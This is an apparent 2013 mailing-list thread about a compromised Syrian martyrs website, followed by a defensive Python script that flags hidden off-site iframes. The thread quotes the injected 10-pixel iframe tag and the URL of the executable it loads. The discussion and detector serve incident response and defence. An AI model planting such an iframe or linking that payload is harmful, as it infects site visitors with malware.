This is the malware:
https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/

--SiNA

SiNA Rabbani:
> holy shit:
>
> <iframe name="I1" width="10" height="10"
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
> border="0"
> frameborder="0">
>
> :/ if you are running Windows don't even go there!!!
>
> Andrew Lewis:
>> I can get to this in 6 hours or so, maybe someone is willing to
>> jump on this before then?
>>
>> -Andrew
>>
>> On Jan 30, 2013, at 11:06 AM, KheOps <[email protected]> wrote:
>>
>>> Dear Libtech,
>>>
>>> We just saw that the website http://www.syrian-martyrs.com
>>> is probably compromised. Every page of the website contains an
>>> iFrame which links to a .exe file which is detected as a virus
>>> by antivirus software:
>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>
>>> The fact that the HTML code is present at the bottom of each page makes
>>> me think that the "index.php" page has been changed in a way
>>> that makes that iFrame appear on every page of the website,
>>> after the dynamic content.
>>>
>>> It also probably means that the attackers have some kind of
>>> access to the server. My guess would be going to a PHP shell,
>>> but I'm no expert in this.
>>>
>>> Any help, clue, investigation, would be very welcome :)
>>>
>>> Thank you, KheOps
>>>
>>> -- Unsubscribe, change to digest, or change password at:
>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech

--
“Be the change you want to see in the world.” Gandhi
OTR: [email protected] a5dae15f45a37e9768f6deae7b54807fc4942ec9
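
A defender-side check for the pattern described in the thread (a tiny off-site iframe pointing at an executable, found at the bottom of every page), as an added example that is not part of the original messages. The size threshold, extension list, the "after `</body>`" heuristic, the function names and the sample HTML with its placeholder hosts are all assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

EXECUTABLE_EXT = (".exe", ".scr", ".msi", ".jar")  # assumed list, extend as needed
MAX_HIDDEN_PX = 10  # assumed threshold: frames this small are effectively invisible

class IframeAudit(HTMLParser):
    """Record each <iframe>: line, attributes, and whether the document had already closed."""
    def __init__(self):
        super().__init__()
        self.frames, self.doc_closed = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append((self.getpos()[0], dict(attrs), self.doc_closed))

    def handle_endtag(self, tag):
        if tag in ("body", "html"):
            self.doc_closed = True

def _px(value):
    value = (value or "").strip().lower()
    value = value[:-2] if value.endswith("px") else value
    return int(value) if value.isdigit() else None  # None: not a plain pixel count

def audit_page(html, site_host):
    """Flag off-site iframes that are also tiny, executable, or appended after </body>."""
    parser = IframeAudit()
    parser.feed(html)
    findings = []
    for line, attrs, trailing in parser.frames:
        src = attrs.get("src") or ""
        url = urlparse(src)
        if not url.hostname or url.hostname.lower() == site_host.lower():
            continue  # same-site or relative frame: out of scope for this check
        dims = [_px(attrs.get("width")), _px(attrs.get("height"))]
        checks = {
            "near-invisible": any(d is not None and d <= MAX_HIDDEN_PX for d in dims),
            "executable-src": url.path.lower().endswith(EXECUTABLE_EXT),
            "after-document-end": trailing,
        }
        reasons = [name for name, hit in checks.items() if hit]
        if reasons:
            findings.append({"line": line, "src": src, "reasons": reasons})
    return findings

# Constructed sample page; example.org / example.net are placeholder hosts.
SAMPLE = ('<html><body>\n<iframe src="https://www.example.org/map" width="600" height="400"></iframe>\n'
          '</body></html>\n<iframe name="I1" width="10" height="10" src="http://files.example.net/up/setup.exe"></iframe>\n')
```

Run `audit_page` over the rendered HTML of several pages of a site: the same finding on every page, always after the dynamic content, points at a shared template or include rather than at individual articles.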
